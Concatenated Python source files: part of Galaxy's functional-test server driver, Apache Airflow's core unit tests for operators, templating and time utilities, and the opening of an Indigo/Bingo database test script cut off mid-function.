def build_shed_app(simple_kwargs):
"""Build a Galaxy app object from a simple keyword arguments.
Construct paste style complex dictionary. Also setup "global" reference
to sqlalchemy database context for tool shed database.
"""
log.info("Tool shed database connection: %s", simple_kwargs["database_connection"])
# TODO: Simplify global_conf to match Galaxy above...
simple_kwargs['__file__'] = 'tool_shed_wsgi.yml.sample'
simple_kwargs['global_conf'] = get_webapp_global_conf()
app = ToolshedUniverseApplication(**simple_kwargs)
log.info("Embedded Toolshed application started")
global tool_shed_context
tool_shed_context = app.model.context
return app
def explicitly_configured_host_and_port(prefix, config_object):
host_env_key = f"{prefix}_TEST_HOST"
port_env_key = f"{prefix}_TEST_PORT"
port_random_env_key = f"{prefix}_TEST_PORT_RANDOM"
default_web_host = getattr(config_object, "default_web_host", DEFAULT_WEB_HOST)
host = os.environ.get(host_env_key, default_web_host)
if os.environ.get(port_random_env_key, None) is not None:
# Ignore the port environment variable, it wasn't explictly configured.
port = None
else:
port = os.environ.get(port_env_key, None)
# If an explicit port wasn't assigned for this test or test case, set this
# environment variable so we know it is random. We can then randomly re-assign
# for new tests.
if port is None:
os.environ["GALAXY_TEST_PORT_RANDOM"] = "1"
else:
os.environ['GALAXY_WEB_PORT'] = port
return host, port
def set_and_wait_for_http_target(prefix, host, port, url_prefix, sleep_amount=0.1, sleep_tries=150):
host_env_key = f"{prefix}_TEST_HOST"
port_env_key = f"{prefix}_TEST_PORT"
os.environ[host_env_key] = host
os.environ[port_env_key] = port
wait_for_http_server(host, port, url_prefix, sleep_amount=sleep_amount, sleep_tries=sleep_tries)
class ServerWrapper:
def __init__(self, name, host, port, prefix=""):
self.name = name
self.host = host
self.port = port
self.prefix = prefix
@property
def app(self):
raise NotImplementedError("Test can be run against target - requires a Galaxy app object.")
def stop(self):
raise NotImplementedError()
class EmbeddedServerWrapper(ServerWrapper):
def __init__(self, app, server, name, host, port, prefix="", thread=None):
super().__init__(name, host, port, prefix)
self._app = app
self._server = server
self._thread = thread
@property
def app(self):
return self._app
def stop(self):
log.info(f"{threading.active_count()} threads were active before stopping embedded server")
if self._server is not None and hasattr(self._server, "server_close"):
log.info(f"Shutting down embedded {self.name} Paste server")
self._server.server_close()
log.info(f"Embedded web server {self.name} stopped")
if self._server is not None and hasattr(self._server, "shutdown"):
log.info(f"Shutting down embedded {self.name} uvicorn server")
self._server.should_exit = True
log.info(f"Embedded web server {self.name} stopped")
if self._thread is not None:
log.info("Stopping embedded server thread")
self._thread.join()
log.info("Embedded server thread stopped")
if self._app is not None:
log.info(f"Stopping application {self.name}")
self._app.shutdown()
log.info(f"Application {self.name} stopped.")
log.info(f"{threading.active_count()} active after stopping embedded server")
class UwsgiServerWrapper(ServerWrapper):
def __init__(self, p, name, host, port):
super().__init__(name, host, port)
self._p = p
self._r = None
self._t = threading.Thread(target=self.wait)
self._t.start()
def __del__(self):
self._t.join()
def wait(self):
self._r = self._p.wait()
def stop(self):
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGTERM)
except Exception:
pass
time.sleep(.1)
try:
os.killpg(os.getpgid(self._p.pid), signal.SIGKILL)
except Exception:
pass
self._t.join()
def launch_uwsgi(kwargs, tempdir, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
config = {}
config["galaxy"] = kwargs.copy()
enable_realtime_mapping = getattr(config_object, "enable_realtime_mapping", False)
if enable_realtime_mapping:
interactive_tool_defaults = {
"interactivetools_prefix": "interactivetool",
"interactivetools_map": os.path.join(tempdir, "interactivetools_map.sqlite"),
"interactivetools_enable": True
}
for key, value in interactive_tool_defaults.items():
if key not in config["galaxy"]:
config["galaxy"][key] = value
yaml_config_path = os.path.join(tempdir, "galaxy.yml")
with open(yaml_config_path, "w") as f:
yaml.dump(config, f)
if enable_realtime_mapping:
# Avoid YAML.dump configuration since uwsgi doesn't like real YAML :( -
# though maybe it would work?
with open(yaml_config_path) as f:
old_contents = f.read()
with open(yaml_config_path, "w") as f:
test_port = str(port) if port else r"[0-9]+"
test_host = re.escape(host) if host else "localhost"
uwsgi_section = REALTIME_PROXY_TEMPLATE.safe_substitute(test_host=test_host, test_port=test_port, tempdir=tempdir)
f.write(uwsgi_section)
f.write(old_contents)
def attempt_port_bind(port):
uwsgi_command = [
"uwsgi",
"--http",
f"{host}:{port}",
"--yaml",
yaml_config_path,
"--module",
"galaxy.webapps.galaxy.buildapp:uwsgi_app_factory()",
"--enable-threads",
"--die-on-term",
]
for path in sys.path:
uwsgi_command.append('--pythonpath')
uwsgi_command.append(path)
handle_uwsgi_cli_command = getattr(
config_object, "handle_uwsgi_cli_command", None
)
if handle_uwsgi_cli_command is not None:
handle_uwsgi_cli_command(uwsgi_command)
# we don't want to quote every argument but we don't want to print unquoted ones either, so do this
log.info("Starting uwsgi with command line: %s", ' '.join(shlex.quote(x) for x in uwsgi_command))
p = subprocess.Popen(
uwsgi_command,
cwd=galaxy_root,
preexec_fn=os.setsid,
)
return UwsgiServerWrapper(
p, name, host, port
)
port = attempt_ports(port)
server_wrapper = attempt_port_bind(port)
try:
set_and_wait_for_http_target(prefix, host, port, url_prefix="/", sleep_tries=50)
log.info(f"Test-managed uwsgi web server for {name} started at {host}:{port}")
return server_wrapper
except Exception:
server_wrapper.stop()
def launch_uvicorn(webapp_factory, prefix=DEFAULT_CONFIG_PREFIX, galaxy_config=None, config_object=None):
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
port = attempt_ports(port)
gx_app = build_galaxy_app(galaxy_config)
gx_wsgi_webapp = webapp_factory(
galaxy_config['global_conf'],
app=gx_app,
use_translogger=False,
static_enabled=True,
register_shutdown_at_exit=False
)
from galaxy.webapps.galaxy.fast_app import initialize_fast_app
app = initialize_fast_app(gx_wsgi_webapp, gx_app)
server, port, thread = uvicorn_serve(app, host=host, port=port)
set_and_wait_for_http_target(prefix, host, port, url_prefix=gx_app.config.galaxy_url_prefix)
log.info(f"Embedded uvicorn web server for {name} started at {host}:{port}{gx_app.config.galaxy_url_prefix}")
return EmbeddedServerWrapper(
gx_app, server, name, host, port, thread=thread, prefix=gx_app.config.galaxy_url_prefix
)
def launch_server(app, webapp_factory, kwargs, prefix=DEFAULT_CONFIG_PREFIX, config_object=None):
"""Launch a web server for a given app using supplied factory.
Consistently read either GALAXY_TEST_HOST and GALAXY_TEST_PORT or
TOOL_SHED_TEST_HOST and TOOL_SHED_TEST_PORT and ensure these are
all set after this method has been called.
"""
name = prefix.lower()
host, port = explicitly_configured_host_and_port(prefix, config_object)
webapp = webapp_factory(
kwargs['global_conf'],
app=app,
use_translogger=False,
static_enabled=True,
register_shutdown_at_exit=False
)
server, port = serve_webapp(
webapp,
host=host, port=port
)
set_and_wait_for_http_target(prefix, host, port, url_prefix="/")
log.info(f"Embedded paste web server for {name} started at {host}:{port}")
return EmbeddedServerWrapper(
app, server, name, host, port
)
class TestDriver:
"""Responsible for the life-cycle of a Galaxy-style functional test.
Sets up servers, configures tests, runs nose, and tears things
down. This is somewhat like a Python TestCase - but different
because it is meant to provide a main() endpoint.
"""
__test__ = False # Prevent pytest from discovering this class (issue #12071)
def __init__(self):
"""Setup tracked resources."""
self.server_wrappers = []
self.temp_directories = []
def setup(self):
"""Called before tests are built."""
def build_tests(self):
"""After environment is setup, setup nose tests."""
def tear_down(self):
"""Cleanup resources tracked by this object."""
self.stop_servers()
for temp_directory in self.temp_directories:
cleanup_directory(temp_directory)
def stop_servers(self):
for server_wrapper in self.server_wrappers:
server_wrapper.stop()
self.server_wrappers = []
def mkdtemp(self):
"""Return a temp directory that is properly cleaned up or not based on the config."""
temp_directory = tempfile.mkdtemp()
self.temp_directories.append(temp_directory)
return temp_directory
def run(self):
"""Driver whole test.
Setup environment, build tests (if needed), run test,
and finally cleanup resources.
"""
configure_environment()
self.setup()
self.build_tests()
try:
success = nose_config_and_run()
return 0 if success else 1
except Exception as e:
log.info("Failure running tests")
raise e
finally:
log.info("Shutting down")
self.tear_down()
class GalaxyTestDriver(TestDriver):
"""Instantial a Galaxy-style nose TestDriver for testing Galaxy."""
testing_shed_tools = False
def _configure(self, config_object=None):
"""Setup various variables used to launch a Galaxy server."""
config_object = self._ensure_config_object(config_object)
self.external_galaxy = os.environ.get('GALAXY_TEST_EXTERNAL', None)
# Allow a particular test to force uwsgi or any test to use uwsgi with
# the GALAXY_TEST_UWSGI environment variable.
use_uwsgi = bool(os.environ.get('GALAXY_TEST_UWSGI', None))
if not use_uwsgi:
if getattr(config_object, "require_uwsgi", None):
use_uwsgi = True
self.use_uwsgi = use_uwsgi
if getattr(config_object, "use_uvicorn", USE_UVICORN):
self.else_use_uvicorn = True
else:
self.else_use_uvicorn = False
# Allow controlling the log format
log_format = os.environ.get('GALAXY_TEST_LOG_FORMAT', None)
if not log_format and use_uwsgi:
log_format = "%(name)s %(levelname)-5.5s %(asctime)s " \
"[p:%(process)s,w:%(worker_id)s,m:%(mule_id)s] " \
"[%(threadName)s] %(message)s"
self.log_format = log_format
self.galaxy_test_tmp_dir = get_galaxy_test_tmp_dir()
self.temp_directories.append(self.galaxy_test_tmp_dir)
self.testing_shed_tools = getattr(config_object, "testing_shed_tools", False)
if getattr(config_object, "framework_tool_and_types", False):
default_tool_conf = FRAMEWORK_SAMPLE_TOOLS_CONF
datatypes_conf_override = FRAMEWORK_DATATYPES_CONF
else:
default_tool_conf = getattr(config_object, "default_tool_conf", None)
datatypes_conf_override = getattr(config_object, "datatypes_conf_override", None)
allow_tool_conf_override = getattr(config_object, "allow_tool_conf_override", True)
self.allow_tool_conf_override = allow_tool_conf_override
self.default_tool_conf = default_tool_conf
self.datatypes_conf_override = datatypes_conf_override
def setup(self, config_object=None):
"""Setup a Galaxy server for functional test (if needed).
Configuration options can be specified as attributes on the supplied
```config_object``` (defaults to self).
"""
self._saved_galaxy_config = None
self._configure(config_object)
self._register_and_run_servers(config_object)
def restart(self, config_object=None, handle_config=None):
self.stop_servers()
self._register_and_run_servers(config_object, handle_config=handle_config)
def _register_and_run_servers(self, config_object=None, handle_config=None):
config_object = self._ensure_config_object(config_object)
self.app = None
if self.external_galaxy is None:
if self._saved_galaxy_config is not None:
galaxy_config = self._saved_galaxy_config
else:
tempdir = tempfile.mkdtemp(dir=self.galaxy_test_tmp_dir)
# Configure the database path.
galaxy_db_path = database_files_path(tempdir)
# Allow config object to specify a config dict or a method to produce
# one - other just read the properties above and use the default
# implementation from this file.
galaxy_config = getattr(config_object, "galaxy_config", None)
if callable(galaxy_config):
galaxy_config = galaxy_config()
if galaxy_config is None:
setup_galaxy_config_kwds = dict(
allow_path_paste=getattr(config_object, "allow_path_paste", False),
use_test_file_dir=not self.testing_shed_tools,
default_install_db_merged=True,
default_tool_conf=self.default_tool_conf,
datatypes_conf=self.datatypes_conf_override,
prefer_template_database=getattr(config_object, "prefer_template_database", False),
log_format=self.log_format,
conda_auto_init=getattr(config_object, "conda_auto_init", False),
conda_auto_install=getattr(config_object, "conda_auto_install", False),
use_shared_connection_for_amqp=getattr(config_object, "use_shared_connection_for_amqp", False),
allow_tool_conf_override=self.allow_tool_conf_override,
)
galaxy_config = setup_galaxy_config(
galaxy_db_path,
**setup_galaxy_config_kwds
)
isolate_galaxy_config = getattr(config_object, "isolate_galaxy_config", False)
if isolate_galaxy_config:
galaxy_config["config_dir"] = tempdir
self._saved_galaxy_config = galaxy_config
if galaxy_config is not None:
handle_galaxy_config_kwds = handle_config or getattr(
config_object, "handle_galaxy_config_kwds", None
)
if handle_galaxy_config_kwds is not None:
handle_galaxy_config_kwds(galaxy_config)
if self.use_uwsgi:
server_wrapper = launch_uwsgi(
galaxy_config,
tempdir=tempdir,
config_object=config_object,
)
elif self.else_use_uvicorn:
server_wrapper = launch_uvicorn(
lambda *args, **kwd: buildapp.app_factory(*args, wsgi_preflight=False, **kwd),
galaxy_config=galaxy_config,
config_object=config_object,
)
self.app = server_wrapper.app
else:
# ---- Build Application --------------------------------------------------
self.app = build_galaxy_app(galaxy_config)
server_wrapper = launch_server(
self.app,
buildapp.app_factory,
galaxy_config,
config_object=config_object,
)
log.info(f"Functional tests will be run against external Galaxy server {server_wrapper.host}:{server_wrapper.port}")
self.server_wrappers.append(server_wrapper)
else:
log.info(f"Functional tests will be run against test managed Galaxy server {self.external_galaxy}")
# Ensure test file directory setup even though galaxy config isn't built.
ensure_test_file_dir_set()
def _ensure_config_object(self, config_object):
if config_object is None:
config_object = self
return config_object
def setup_shed_tools(self, testing_migrated_tools=False, testing_installed_tools=True):
setup_shed_tools_for_test(
self.app,
self.galaxy_test_tmp_dir,
testing_migrated_tools,
testing_installed_tools
)
def build_tool_tests(self, testing_shed_tools=None, return_test_classes=False):
if self.app is None:
return
if testing_shed_tools is None:
testing_shed_tools = getattr(self, "testing_shed_tools", False)
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = self.app.toolbox
# When testing data managers, do not test toolbox.
test_classes = functional.test_toolbox.build_tests(
app=self.app,
testing_shed_tools=testing_shed_tools,
master_api_key=get_admin_api_key(),
user_api_key=get_user_api_key(),
)
if return_test_classes:
return test_classes
return functional.test_toolbox
def run_tool_test(self, tool_id, index=0, resource_parameters=None, **kwd):
if resource_parameters is None:
resource_parameters = {}
host, port, url = target_url_parts()
galaxy_interactor_kwds = {
"galaxy_url": url,
"master_api_key": get_admin_api_key(),
"api_key": get_user_api_key(),
"keep_outputs_dir": None,
}
galaxy_interactor = GalaxyInteractorApi(**galaxy_interactor_kwds)
verify_tool(
tool_id=tool_id,
test_index=index,
galaxy_interactor=galaxy_interactor,
resource_parameters=resource_parameters,
**kwd
)
def drive_test(test_driver_class):
"""Instantiate driver class, run, and exit appropriately."""
test_driver = test_driver_class()
sys.exit(test_driver.run())
__all__ = (
"copy_database_template",
"build_logger",
"drive_test",
"FRAMEWORK_UPLOAD_TOOL_CONF",
"FRAMEWORK_SAMPLE_TOOLS_CONF",
"FRAMEWORK_DATATYPES_CONF",
"database_conf",
"get_webapp_global_conf",
"nose_config_and_run",
"setup_galaxy_config",
"TestDriver",
"wait_for_http_server",
)
|
test_core.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import multiprocessing
import os
import signal
import unittest
from datetime import timedelta
from time import sleep
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from airflow import settings
from airflow.exceptions import AirflowException, AirflowTaskTimeout
from airflow.hooks.base_hook import BaseHook
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.models import DagBag, DagRun, TaskFail, TaskInstance
from airflow.models.baseoperator import BaseOperator
from airflow.models.dag import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python import PythonOperator
from airflow.settings import Session
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from airflow.utils.types import DagRunType
from tests.test_utils.config import conf_vars
from tests.test_utils.db import clear_db_dags, clear_db_runs
DEV_NULL = '/dev/null'
DEFAULT_DATE = datetime(2015, 1, 1)
TEST_DAG_ID = 'unit_tests'
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super().__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, context):
pass
class TestCore(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True, read_dags_from_db=False)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def tearDown(self):
session = Session()
session.query(DagRun).filter(
DagRun.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.query(TaskInstance).filter(
TaskInstance.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.query(TaskFail).filter(
TaskFail.dag_id == TEST_DAG_ID).delete(
synchronize_session=False)
session.commit()
session.close()
clear_db_dags()
clear_db_runs()
def test_check_operators(self):
conn_id = "sqlite_default"
captain_hook = BaseHook.get_hook(conn_id=conn_id) # quite funny :D
captain_hook.run("CREATE TABLE operator_test_table (a, b)")
captain_hook.run("insert into operator_test_table values (1,2)")
self.dag.create_dagrun(run_type=DagRunType.MANUAL, state=State.RUNNING, execution_date=DEFAULT_DATE)
op = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
op = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captain_hook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
msg = 'Invalid arguments were passed to BashOperator (task_id: test_illegal_args).'
with conf_vars({('operators', 'allow_illegal_arguments'): 'True'}):
with self.assertWarns(PendingDeprecationWarning) as warning:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
assert any(msg in str(w) for w in warning.warnings)
def test_illegal_args_forbidden(self):
"""
Tests that operators raise exceptions on illegal arguments when
illegal arguments are not allowed.
"""
with self.assertRaises(AirflowException) as ctx:
BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertIn(
('Invalid arguments were passed to BashOperator '
'(task_id: test_illegal_args).'),
str(ctx.exception))
def test_bash_operator(self):
op = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
self.dag.create_dagrun(run_type=DagRunType.MANUAL, state=State.RUNNING, execution_date=DEFAULT_DATE)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
op = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command="echo \u2600",
dag=self.dag,
output_encoding='utf-8')
self.dag.create_dagrun(run_type=DagRunType.MANUAL, state=State.RUNNING, execution_date=DEFAULT_DATE)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
op = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
AirflowTaskTimeout,
op.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
# Annoying workaround for nonlocal not existing in python 2
data = {'called': False}
def check_failure(context, test_case=self):
data['called'] = True
error = context.get('exception')
test_case.assertIsInstance(error, AirflowException)
op = BashOperator(
task_id='check_on_failure_callback',
bash_command="exit 1",
dag=self.dag,
on_failure_callback=check_failure)
self.assertRaises(
AirflowException,
op.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
self.assertTrue(data['called'])
def test_dryrun(self):
op = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
op.dry_run()
def test_sqlite(self):
import airflow.providers.sqlite.operators.sqlite
op = airflow.providers.sqlite.operators.sqlite.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
self.dag.create_dagrun(run_type=DagRunType.MANUAL, state=State.RUNNING, execution_date=DEFAULT_DATE)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
op = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
AirflowTaskTimeout,
op.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
op = PythonOperator(
task_id='test_py_op',
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
self.dag.create_dagrun(run_type=DagRunType.MANUAL, state=State.RUNNING, execution_date=DEFAULT_DATE)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
op = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
op.execute = verify_templated_field
self.dag.create_dagrun(run_type=DagRunType.MANUAL, state=State.RUNNING, execution_date=DEFAULT_DATE)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject:
def __len__(self): # pylint: disable=invalid-length-returned
return NotImplemented
def __bool__(self): # pylint: disable=invalid-bool-returned, bad-option-value
return NotImplemented
op = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
op.resolve_template_files()
def test_task_get_template(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
self.dag_bash.create_dagrun(
run_type=DagRunType.MANUAL,
state=State.RUNNING,
execution_date=DEFAULT_DATE
)
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEqual(context['ds'], '2015-01-01')
self.assertEqual(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEqual(context['next_ds'], '2015-01-02')
self.assertEqual(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEqual(context['prev_ds'], '2014-12-31')
self.assertEqual(context['prev_ds_nodash'], '20141231')
self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEqual(context['ts_nodash'], '20150101T000000')
self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')
self.assertEqual(context['yesterday_ds'], '2014-12-31')
self.assertEqual(context['yesterday_ds_nodash'], '20141231')
self.assertEqual(context['tomorrow_ds'], '2015-01-02')
self.assertEqual(context['tomorrow_ds_nodash'], '20150102')
def test_local_task_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
self.dag_bash.create_dagrun(
run_type=DagRunType.MANUAL,
state=State.RUNNING,
execution_date=DEFAULT_DATE
)
ti.run(ignore_ti_state=True)
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
from airflow.executors.sequential_executor import SequentialExecutor
TI = TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
proc = multiprocessing.Process(target=job.run)
proc.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
proc.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
op1 = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
op2 = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
op1.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception: # pylint: disable=broad-except
pass
try:
op2.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except Exception: # pylint: disable=broad-except
pass
op1_fails = session.query(TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
op2_fails = session.query(TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
self.assertEqual(0, len(op1_fails))
self.assertEqual(1, len(op2_fails))
self.assertGreaterEqual(sum([f.duration for f in op2_fails]), 3)
def test_externally_triggered_dagrun(self):
TI = TaskInstance
# Create the dagrun between two "scheduled" execution dates of the DAG
execution_date = DEFAULT_DATE + timedelta(days=2)
execution_ds = execution_date.strftime('%Y-%m-%d')
execution_ds_nodash = execution_ds.replace('-', '')
dag = DAG(
TEST_DAG_ID,
default_args=self.args,
schedule_interval=timedelta(weeks=1),
start_date=DEFAULT_DATE)
task = DummyOperator(task_id='test_externally_triggered_dag_context',
dag=dag)
dag.create_dagrun(run_type=DagRunType.SCHEDULED,
execution_date=execution_date,
state=State.RUNNING,
external_trigger=True)
task.run(
start_date=execution_date, end_date=execution_date)
ti = TI(task=task, execution_date=execution_date)
context = ti.get_template_context()
# next_ds/prev_ds should be the execution date for manually triggered runs
self.assertEqual(context['next_ds'], execution_ds)
self.assertEqual(context['next_ds_nodash'], execution_ds_nodash)
self.assertEqual(context['prev_ds'], execution_ds)
self.assertEqual(context['prev_ds_nodash'], execution_ds_nodash)
|
part_test.py | import sys
import threading
sys.path.append('../../common')
from env_indigo import *
def outPrint(str, pid, output):
#output = None
if output == None:
print(str)
else:
old_out = output[pid]
output[pid] = '{0}\n{1}'.format(old_out, str)
def insertSmi(db, pid, input_smi, output=None):
index = 0
wrongStructures = 0
#outPrint('Inserting molecules from:{1}'.format(pid, input_smi), pid, output)
smi_path = joinPathPy(os.path.join('molecules', input_smi), __file__)
for mol in indigo.iterateSmilesFile(smi_path):
try:
db.insert(mol)
except(BingoException, e):
